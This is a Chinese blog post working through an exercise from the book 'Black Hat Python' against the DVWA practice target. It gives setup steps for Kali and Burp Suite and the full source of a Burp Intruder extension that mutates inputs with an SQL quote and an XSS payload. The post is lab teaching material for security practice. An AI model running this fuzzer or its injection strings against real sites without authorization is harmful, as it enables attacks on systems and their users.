近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》，书中一共24个实验，今天复现第15个实验（burpsuite载核生成器插件），我的测试环境是mbp电脑+kali虚拟机+dvwa在线靶场。当前只支持python2.7的环境，稍微调整一下软链接，然后我把kali 上的jdk和burpsuite都卸载了，最后用的是jdk 1.8和burpsuite 1.7.36，成功复现了这个实验，顺便说一下，做了好多次实验之后，唯手熟尔～

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

步骤一：环境准备

kali 安装jdk1.8

apt-get update
apt-get install software-properties-common
apt-add-repository 'deb http://security.debian.org/debian-security stretch/updates main'
apt-get update
apt-get install openjdk-8-jdk

选择jdk1.8

update-alternatives --config java

更新python2的软连接

ln -s /usr/bin/python2 /usr/bin/python

安装较低版本的burpsuite 1.7.36

wget https://portswigger.net/burp/releases/download?product=community&version=1.7.36&type=linux
sudo chmod +x burpsuite_community_linux_v1_7_36.sh
sudo ./burpsuite_community_linux_v1_7_36.sh

导入成功，这里需要注意路径中不要有中文

步骤二：实验网站准备

选择dvwa在线靶场[1]

步骤三：实战演练

1、进入xss注入模块，提交一个字符串

2、然后在burp的proxy模块，将载核发送到intruder模块

3、在intruder模块中payload页面下，选择payload type为Extension-generated，然后在payload options里面选择BHP Payload Generator 就大功告成了～

4、点击start attack，这里实际上测试出了弹窗，但是显示的并不友好

参考代码：

# -*- coding: utf-8 -*-
# @Time    : 2022/6/14 7:15 PM
# @Author  : ailx10
# @File    : bhf_fuzzer.py

from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator

from java.util import List,ArrayList
import random

class BurpExtender(IBurpExtender,IIntruderPayloadGeneratorFactory):
    def registerExtenderCallbacks(self,callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()

        callbacks.registerIntruderPayloadGeneratorFactory(self)

        return

    def getGeneratorName(self):
        return "BHP Payload Generator"

    def createNewInstance(self,attack):
        return BHPFuzzer(self,attack)

class BHPFuzzer(IIntruderPayloadGenerator):
    def __init__(self,extender,attack):
        self._extender = extender
        self._helpers = extender._helpers
        self._attack = attack
        self.max_payloads = 10
        self.num_iterations = 0

        return

    def hasMorePayloads(self):
        if self.num_iterations == self.max_payloads:
            return False
        else:
            return True

    def getNextPayload(self,current_payload):
        payload = "".join(chr(x) for x in current_payload)
        payload = self.mutate_payload(payload)
        self.num_iterations += 1
        return payload

    def reset(self):
        self.num_iterations = 0
        return

    def mutate_payload(self,original_payload):
        picker = random.randint(1,3)
        offset = random.randint(0,len(original_payload)-1)
        front,back = original_payload[:offset],original_payload[offset:]
        # SQL
        if picker == 1:
            front += "'"
        # XSS
        elif picker == 2:
            front += "<img src=xss onerror=alert(1)>"
        # Randomly extract a piece of data from the original carrier core, repeat it any number of times,
        # and append it to the end of the front block
        elif picker == 3:
            chunk_length = random.randint(0,len(back)-1)
            repeater = random.randint(1,10)
            for _ in range(repeater):
                front += original_payload[:offset + chunk_length]

        return front + back

参考

1. ^dvwa在线靶场 https://www.vulnspy.com/dvwa/

发布于 2022-06-14 21:15